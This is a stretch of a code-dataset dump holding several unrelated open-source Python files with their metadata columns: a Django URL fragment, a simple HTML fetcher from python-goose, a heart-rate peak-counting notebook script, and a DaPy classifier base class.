path('profile-edit/<int:pk>', ProfileEditView.as_view(), name='profile edit'),
path('profile-delte/<int:pk>', ProfileDeleteView.as_view(), name='profile delete')
)
| 43.6875 | 86 | 0.719599 | 80 | 699 | 6.175 | 0.425 | 0.072874 | 0.121457 | 0.103239 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111588 | 699 | 15 | 87 | 46.6 | 0.795491 | 0 | 0 | 0 | 0 | 0 | 0.226037 | 0.061516 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.166667 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a56cd9842da7d235a104071c8d40481b9ff9bde5 | 1,364 | py | Python | goose/network.py | frnsys/python-goose | 7eca5694e8f0d8e45c986b52e904fa6baaa6e85e | [
"Apache-2.0"
] | 1 | 2018-04-19T06:48:16.000Z | 2018-04-19T06:48:16.000Z | goose/network.py | frnsys/python-goose | 7eca5694e8f0d8e45c986b52e904fa6baaa6e85e | [
"Apache-2.0"
] | null | null | null | goose/network.py | frnsys/python-goose | 7eca5694e8f0d8e45c986b52e904fa6baaa6e85e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""\
This is a python port of "Goose" orignialy licensed to Gravity.com
under one or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership.
Python port was written by Xavier Grangier for Recrutae
Gravity.com licenses this file
to you under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Prefer the Python 2 urllib2 module; fall back to urllib.request on
# Python 3.  Both are bound to the name `request` and expose
# Request/urlopen used below.
try:
    import urllib2 as request
except ImportError:
    from urllib import request
class HtmlFetcher(object):
    """Minimal HTML fetcher used to download a page for extraction."""

    def __init__(self):
        pass

    def get_http_client(self):
        # placeholder kept for interface compatibility
        pass

    def get_html(self, config, url):
        """Fetch *url* and return the raw response body.

        `config.browser_user_agent` is sent as the User-agent header.
        Returns None when the request fails for any reason (the
        original best-effort semantics are preserved).
        """
        headers = {'User-agent': config.browser_user_agent}
        req = request.Request(url, headers=headers)
        try:
            result = request.urlopen(req).read()
        except Exception:
            # narrowed from a bare `except:` so KeyboardInterrupt and
            # SystemExit are no longer swallowed silently
            return None
        return result
| 27.28 | 72 | 0.710411 | 191 | 1,364 | 5.026178 | 0.591623 | 0.0625 | 0.027083 | 0.033333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005655 | 0.222141 | 1,364 | 49 | 73 | 27.836735 | 0.899152 | 0.625367 | 0 | 0.235294 | 0 | 0 | 0.020619 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.176471 | false | 0.117647 | 0.176471 | 0 | 0.529412 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a57cdedb5dac53e59a413dc3b21f8571b80089a7 | 776 | py | Python | Heart_Score.py | alokm014/Heart-Score | 44d862c445b4c0f90b73d7496f78c11a188e251f | [
"MIT"
] | 1 | 2019-12-25T17:02:30.000Z | 2019-12-25T17:02:30.000Z | Heart_Score.py | alokm014/Heart-Score | 44d862c445b4c0f90b73d7496f78c11a188e251f | [
"MIT"
] | null | null | null | Heart_Score.py | alokm014/Heart-Score | 44d862c445b4c0f90b73d7496f78c11a188e251f | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
from matplotlib.pyplot import plot, scatter, show
from numpy import NaN, Inf, arange, isscalar, asarray, array
# In[2]:
get_ipython().magic(u'matplotlib inline')
# In[3]:
df=pd.read_csv("Heart_Rate.csv")
# In[4]:
df.info()
# In[5]:
signal=df['Signal'].tolist()
# In[6]:
plot(signal)
# In[7]:
plot(signal[0:99])
# In[8]:
beat_count=0
maxtab=[]
for k in range(1,len(signal)-1):
if(signal[k] > signal[k-1] and signal[k] > signal[k+1] and signal[k] > 1):
maxtab.append(signal[k])
beat_count= beat_count+1
N = len(signal)
fs = 100
duration_in_sec = N/fs
duration_in_min = duration_in_sec/60
BPM = beat_count/duration_in_min
print"Heart Rate:" +str(BPM)
| 11.938462 | 78 | 0.641753 | 133 | 776 | 3.631579 | 0.503759 | 0.086957 | 0.049689 | 0.057971 | 0.089027 | 0.089027 | 0.089027 | 0.089027 | 0 | 0 | 0 | 0.038095 | 0.188144 | 776 | 64 | 79 | 12.125 | 0.728571 | 0.115979 | 0 | 0 | 0 | 0 | 0.071111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.142857 | null | null | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a580cb1b1aec9ce853e31bbb6c1dcf39c5415edf | 1,922 | py | Python | DaPy/methods/classifiers/classifier.py | huihui7987/DaPy | b2bf72707ffcc92d05af1ac890e0786d5787816e | [
"RSA-MD"
] | 552 | 2018-03-14T07:40:44.000Z | 2022-03-30T19:15:23.000Z | DaPy/methods/classifiers/classifier.py | huihui7987/DaPy | b2bf72707ffcc92d05af1ac890e0786d5787816e | [
"RSA-MD"
] | 12 | 2018-03-19T10:29:56.000Z | 2021-12-18T04:47:29.000Z | DaPy/methods/classifiers/classifier.py | huihui7987/DaPy | b2bf72707ffcc92d05af1ac890e0786d5787816e | [
"RSA-MD"
] | 49 | 2018-03-13T14:27:00.000Z | 2022-02-26T09:52:11.000Z | from DaPy.core import Series, SeriesSet
from DaPy.core import is_seq
from copy import copy
def proba2label(seq, labels):
    """Map a probability table to class labels.

    Input with more than one column is treated as per-class scores
    (argmax wins); a single column is treated as binary probabilities.
    """
    if not hasattr(seq, 'shape'):
        seq = SeriesSet(seq)
    n_columns = seq.shape[1]
    if n_columns > 1:
        return clf_multilabel(seq, labels)
    return clf_binlabel(seq, labels)
def clf_multilabel(seq, groupby=None):
    """Return the argmax label of each row of *seq*.

    Parameters
    ----------
    seq : matrix-like
        per-class score table; each row's largest column wins.
    groupby : list of str or dict, optional
        maps column index -> label name; indices without a mapping fall
        back to the raw index value.
    """
    if is_seq(groupby):
        groupby = dict(enumerate(map(str, groupby)))
    if not groupby:
        groupby = dict()
    # explicit check instead of `assert`, which is stripped under
    # `python -O`; the message now names the actual parameter
    if not isinstance(groupby, dict):
        raise TypeError('`groupby` must be a list of str or dict object.')
    max_ind = seq.argmax(axis=1).T.tolist()[0]
    return Series(groupby.get(int(_), _) for _ in max_ind)
def clf_binlabel(seq, labels, cutpoint=0.5):
    """Binarise probabilities: labels[0] when p >= cutpoint, else labels[1]."""
    chosen = (labels[0] if proba >= cutpoint else labels[1] for proba in seq)
    return Series(chosen)
class BaseClassifier(object):
    """Shared base class for classifiers: label bookkeeping, accuracy
    computation and prediction helpers.

    Subclasses are expected to provide `self._engine` (matrix backend
    with a `mat()` constructor) and `self._forecast()`.
    """

    def __init__(self):
        # fitted class labels; populated by subclasses
        self._labels = []

    @property
    def labels(self):
        # return a copy so callers cannot mutate the fitted labels
        return copy(self._labels)

    def _calculate_accuracy(self, predict, target):
        # compare the argmax class index row-by-row between prediction
        # and one-hot target; result is the fraction of matching rows
        pred_labels = predict.argmax(axis=1).T.tolist()[0]
        targ_labels = target.argmax(axis=1).T.tolist()[0]
        return sum(1.0 for p, t in zip(pred_labels, targ_labels) if p == t) / len(predict)

    def predict_proba(self, X):
        '''
        Predict your own data with fitted model

        Parameter
        ---------
        data : matrix
            The new data that you expect to predict.

        Return
        ------
        Matrix: the predict result of your data.
        '''
        X = self._engine.mat(X)
        return self._forecast(X)

    def predict(self, X):
        '''
        Predict your data with a fitted model and return the label

        Parameter
        ---------
        data : matrix
            the data that you expect to predict

        Return
        ------
        Series : the labels of each record
        '''
        return proba2label(self.predict_proba(X), self._labels)
| 27.855072 | 90 | 0.599376 | 255 | 1,922 | 4.4 | 0.356863 | 0.032086 | 0.029412 | 0.032086 | 0.118538 | 0.118538 | 0.101604 | 0 | 0 | 0 | 0 | 0.011687 | 0.287721 | 1,922 | 68 | 91 | 28.264706 | 0.807889 | 0.186785 | 0 | 0 | 0 | 0 | 0.036325 | 0 | 0 | 0 | 0 | 0 | 0.029412 | 1 | 0.235294 | false | 0 | 0.088235 | 0.058824 | 0.588235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.